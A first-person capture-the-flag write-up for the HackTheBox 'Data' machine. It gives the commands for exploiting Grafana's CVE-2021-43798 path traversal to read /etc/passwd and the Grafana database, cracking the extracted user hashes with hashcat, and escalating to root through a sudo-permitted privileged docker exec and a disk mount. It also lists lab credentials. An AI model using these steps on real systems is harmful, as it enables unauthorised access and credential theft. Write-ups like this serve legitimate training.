As we get deep into this engagement, I’ll demonstrate my penetration testing methodology and my thoughts while exploiting and scanning the target, where I perform various techniques and go through trial and error while pentesting.

First of all, we use the ping tool to send ICMP Requests to see if the host is up and running :

As we can see from the screenshot above, the target is up and running. Let's go to the next step, which is scanning the target for open ports and possible vulnerabilities!

I would always use nmap in that case, but this time, let's spice things up and use another tool just for the fun of it. Using Zenmap will be the pathway this time.

From the initial scan, we can find two open ports: port 22, which is SSH, and port 3000, which is HTTP running Grafana HTTP. Let's head to the web server running on port 3000 to see if we can find something interesting.

By going to the dashboard of Grafana on the Web server running on port 3000, I found out that a vulnerable version is present, the version is: v8.0.0 (41f0542c1e)

Vulnerable to Directory Traversal and Arbitrary File Read.

The CVE is : CVE-2021–43798 — Grafana Exploit

```
Details about the Vulnerability :

```
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.

Next, by running the PoC, I can test the arbitrary read by using the script normally :

By reading /etc/passwd, I could confirm that the path traversal vulnerability is present.

Next, I would read something that gives me more value. Let's dig deeper.

Following a hint on Guided Mode in HTB and related to Grafana DB:

Grafana DB file on Data

It is in the default location. Reading /etc/grafana/grafana.ini will show the path as well, though in a couple of pieces.

Maybe let's try and read this file?

Some information that is worth noting:

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

Found a user called Boris, maybe that will be our initial entry that we can take.

Let's view the Database we downloaded and see if we can find any juicy information, like a password or something.

by examining the Grafana.db file, I could use the following commands in sequence to find the hashes of two users: Admin & Boris.

sqlite> .tables
sqlite> .headers on
sqlite> select * from user;
sqlite> select login,password,salt from user;

Bingo, I found the following hashes:

admin|7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S
boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl

Next, im going to use a repo that generates hashes that can be used with hashcat using this SQLite Grafana hashes:

7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl

by using the repo :

https://github.com/iamaldi/grafana2hashcat

I can run the following command to generate the hashes:

python /opt/grafana2hashcat/grafana2hashcat.py grafana_hashsalt -o grafanahashes

┌──(root💀CSEC)-[/opt/grafana2hashcat]
└─# cat grafanahashes
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=

Now to the fun part, Cracking:

a tool I will use, which is my favorite, hashcat.

hashcat grafanahashes /usr/share/wordlists/rockyou.txt

And in less than a minute, I’ve found the password for Boris, probably.

Let's log in to SSH with the found credentials.

FOUND CREDENTIALS: sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1

And here we go, successfully logged in:

I ran sudo -l and found that the following can be run as root without a password, which hints at a good method to escalate the privileges to root…

boris@data:/$ sudo -l
Matching Defaults entries for boris on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User boris may run the following commands on localhost:
(root) NOPASSWD: /snap/bin/docker exec *
boris@data:/$ ^C

Going forward, found an ID for the container by running the ps command to list the running processes.

e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 = Docker Container ID.

Next, I’ll run the following command to get a Root shell:

sudo docker exec -it — privileged — user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 bash

then I’ll mount the dev device that I found earlier:

mount /dev/sda1 /mnt/

And here we go, root achieved: